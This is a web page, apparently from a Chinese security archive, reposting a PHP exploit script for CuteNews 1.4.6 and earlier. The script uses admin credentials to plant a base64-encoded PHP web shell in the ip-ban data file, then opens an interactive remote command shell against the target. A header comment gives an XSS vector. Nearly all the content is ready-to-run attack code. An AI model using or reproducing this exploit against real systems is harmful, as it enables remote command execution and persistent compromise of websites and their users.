首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.)
来源:staker[at]hotmail[dot]it 作者:athos 发布时间:2009-01-09  
#!/usr/bin/php -q
<?php

/*********************************************************************
* CuteNews <= 1.4.6 (ip ban) XSS / Remote Command Execution Exploit *
* by athos - staker[at]hotmail[dot]it                               *
* http://cutephp.com                                                *
*-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
* Remote Command Execution                                          *
*-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
* you need a super account (administrator)                          *
* so you can write in ipban.db.php anything ;)                      *
*                                                                   *
* works regardless of php.ini settings! enjoy your ais              *
* note: this vuln is a privilege escalation                         * 
*                                                                   *
*-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
* Cross Site Scripting                                              *
*-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*          
* http://[host]/[path]//index.php?mod=[Javascript Code]             *
*********************************************************************/

error_reporting(0);

list($cli,$host,$path,$username,$password) = $argv;

if ($argc != 5) { 
   
    print "\n+-------------------------------------------------------------+\n";
    print "\r| CuteNews <= 1.4.6 (ip ban) Remote Command Execution Exploit |\n";
    print "\r+-------------------------------------------------------------+\n";
    print "\rby athos - staker[at]hotmail[dot]it / http://cutephp.com\n\n";
    print "\rUsage: php xpl.php [host] [path] [username] [password]\n\n";
    print "\rhost     + localhost\n";
    print "\rpath     + /cutenews\n";
    print "\rusername + admin username\n";
    print "\rpassword + admin password\n\n";
    exit;     
}        

exploit();

function login () {
   
    global $username,$password;
   
    $cookies .= "username={$username}; md5_password=";
    $cookies .= md5($password);
    
    return $cookies;
}   


function check_login() {
   
    global $host,$path;
   
    $auth .= login();
   
    $data .= "GET /{$path}/index.php HTTP/1.1\r\n";
    $data .= "Host: {$host}\r\n";
    $data .= "User-Agent: Lynx (textmode)\r\n";
    $data .= "Cookie: $auth;\n";
    $data .= "Connection: close\r\n\r\n";
   
    if (preg_match('/Welcome/i',$data)) {
        return true;
    }
    else {
        die("Login Failed\n");
    }   
}


function exploit() {

    global $host,$path;
   
    $login  = login();
    $shell = "PD9waHAgDQpwYXNzdGhydSgkX0dFVFsnYyddKTsgDQo/Pg==";
   
    $shell = base64_decode($shell);
    $post  = "add_ip={$shell}&action=add&mod=ipban";
   
    $data .= "POST /{$path}/index.php HTTP/1.1\r\n";
    $data .= "Host: {$host}\r\n";
    $data .= "User-Agent: Lynx (textmode)\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Cookie: $login\r\n";
    $data .= "Referer: http://{$host}/{$path}/index.php\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($post)."\r\n\r\n";
    $data .= "{$post}\r\n\r\n";
          
    if (eregi('passthru',data_send($host,$data))) {
        yeat_shell();
    }
    else {
        die("Exploit Failed!\n");
    }                
}


function yeat_shell() {
   
    while (1) {
        echo "yeat[shell]~$: ";
        $exec = stripslashes(trim(fgets(STDIN))); 
       
        if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");
        if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");
        if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");
       
        print data_exec($exec);    
    }
}


function data_exec($exec) {
   
    global $host,$path;
   
    $exec = urlencode($exec);
    $data .= "GET /{$path}/data/ipban.db.php?c={$exec} HTTP/1.1\r\n";
    $data .= "Host: {$host}\r\n";
    $data .= "User-Agent: Lynx (textmode)\r\n";
    $data .= "Connection: close\r\n\r\n";
   
    $html = data_send ($host,$data);
    $html = str_replace('|0||',null,$html);
    return $html;
}


function data_send ($host,$data) {
  
    if (!$sock = @fsockopen($host,80)) {
        die("Connection refused,try again!\n");
    }   fputs($sock,$data);
   
    while (!feof($sock)) { $html .= fgets($sock); }
   
    fclose($sock);
    return $html;
}  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GOM Player 2.0.12.3375 (.ASX F
·Pizzis CMS <= 1.5.1 (visualizz
·XOOPS 2.3.2 (mydirname) Remote
·WinAmp GEN_MSN Plugin Heap Buf
·Anope IRC Services With bs_fan
·VUPlayer <= 2.49 .PLS Universa
·IntelliTamper (2.07/2.08) Lang
·Audacity 1.6.2 (.aup File) Rem
·Virgilio Toolbar Toolbar Activ
·Perception LiteServe 2.0.1 (us
·VMware COM DB ActiveX Remote B
·CoolPlayer BUILD 219 (Playlist
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved